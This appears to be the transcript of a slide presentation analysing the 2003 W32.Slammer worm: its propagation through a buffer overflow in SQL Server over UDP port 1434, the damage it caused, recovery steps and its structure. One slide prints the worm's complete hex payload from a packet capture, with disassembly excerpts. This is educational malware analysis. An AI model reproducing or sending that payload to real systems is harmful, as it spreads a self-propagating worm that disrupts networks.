Analysis of the W32.Slammer Worm - PowerPoint PPT Presentation

About This Presentation
Title:

Analysis of the W32.Slammer Worm

Description:

Analysis of the W32.Slammer Worm Mikhail Akhmeteli W32.Slammer Overview Aliases: SQL Slammer, Saphire, W32.SQLExp.Worm Released: January 25, 2003, at about 5:30 a ... – PowerPoint PPT presentation

Number of Views:89
Avg rating:3.0/5.0
Slides: 18
Provided by: MikhailA
Category:
Tags: analysis | cisco | router | slammer | w32 | worm

less

Transcript and Presenter's Notes

Title: Analysis of the W32.Slammer Worm


1
Analysis of the W32.Slammer Worm
  • Mikhail Akhmeteli

2
W32.Slammer Overview
  • Aliases SQL Slammer, Saphire,
    W32.SQLExp.Worm
  • Released January 25, 2003, at about 530
    a.m. (GMT)
  • Fastest worm in history
  • Spread world-wide in under 10 minutes
  • Doubled infections every 8.5 seconds
  • 376 bytes long

3
Overview (continued)
  • Platform Microsoft SQL Server 2000
  • Vulnerability Buffer overflow
  • Patch available for 6 months
  • Propagation Single UDP packet
  • Features Memory resident, hand-coded in assembly

4
Direct Damage
  • Infected between 75,000 and 160,000 systems
  • Disabled SQL Server databases on infected
    machines
  • Saturated world networks with traffic
  • Disrupted Internet connectivity world-wide

5
Effective Damage
  • South Korea was taken off-line
  • Disrupted financial institutions
  • Airline delays and cancellations
  • Affected many U.S. government and commercial
    websites

6
Specific Damage
  • 13,000 Bank of America ATMs stopped working
  • Continental Airlines flights were cancelled and
    delayed ticketing system was inundated with
    traffic. Airport self-check-in kiosks stopped
    working
  • Activated Cisco router bugs at Internet backbones

7
Propagation Technique
  • Single UDP packet
  • Targets port 1434 (Microsoft-SQL-Monitor)
  • Causes buffer overflow
  • Continuously sends itself via UDP packets to
    pseudo-random IP addresses, including broadcast
    and multicast addresses
  • Does not check whether target machines exist

8
Recovery
  • Disconnect from network
  • Reboot the machine, or restart SQL Server
  • Block port 1434 at external firewall
  • Install patch

9
Propagation Speed
  • Infected 90 of vulnerable machines within 10
    minutes
  • Doubled infections every 8.5 seconds
  • Achieved 55 million scans per second
  • Two orders of magnitude faster than Code Red

10
Propagation Speed
Source http//www.caida.org/analysis/security/sap
phire/
11
Infections 30 Minutes After Release
Source http//www.caida.org/analysis/security/sap
phire/
12
Propagation Analysis
  • Rapid spread made timely defense impossible
  • Rapid spread caused worm copies to compete
  • Bandwidth limited, not latency limited (doesnt
    wait to establish connection)
  • Easy to stop at firewall

13
Possible Variations
  • Could have attacked HTTP or DNS servers
  • Could have gone dormant
  • Could have forged source port to DNS resolution

14
Worm Composition
  • 376 bytes long
  • Less than 300 bytes of executable code
  • 404 byte UDP packets, including headers
  • Composed of 4 functional sections

15
Worm Functions
  • Reconstructs session from buffer overflow
  • Obtains (and verifies!) Windows API function
    addresses
  • Initializes pseudo-random number generator and
    socket structures
  • Continuously generates random IP addresses and
    sends UDP data-grams of itself

16
Packet Capture
01/27-154647.167917 206.204.21.1541087 -gt 24.59.36.1571434 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6 EB CA ................ ................ ................ ................ ................ ................ ....B.........p. B.p.B........h.. .B.....1...P..5. ...P..Qh.dllhel3 2hkernQhounthick ChGetTf.llQh32.d hws2_f.etQhsockf .toQhsend....B.E .P..P.E.P.E.P..P ....B....U..Qt. ....B....1.QQP.. ..........Q.E.P. E.P..j.j.j...P.E .P.E.P........lta ...E..._at_........ ...).......E.j.. E.P1.Qf..x.Q.E.P .E.P.... Selections from Disassembled code (by eEye Digital Security) push 42B0C9DCh RET sqlsort.dll -gt jmp esp . . Load strings . . . . call dword ptr esi GetProcAddress() call eax GetTickCount() . . . . call esi sendto()
Buffer Overflow
Reconstruct session
Get Windows API addresses
Initialize PRNG and socket
Send Packets
17
References
  • eEye Digital Security. http//www.eeye.com/html/Re
    search/Flash/sapphire.txt
  • Cooperative Association for Internet Data
    Analysis (CAIDA) http//www.caida.org/outreach/pap
    ers/2003/sapphire/sapphire.html
  • Internet Storm Center. http//isc.incidents.org/an
    alysis.html?id180
  • The Washington Post. http//www.washingtonpost.co
    m/wp-dyn/articles/A46928-2003Jan26.html
  • CNET News.com. http//news.com.com/2100-1001-98
    2135.html
Write a Comment
User Comments (0)
About PowerShow.com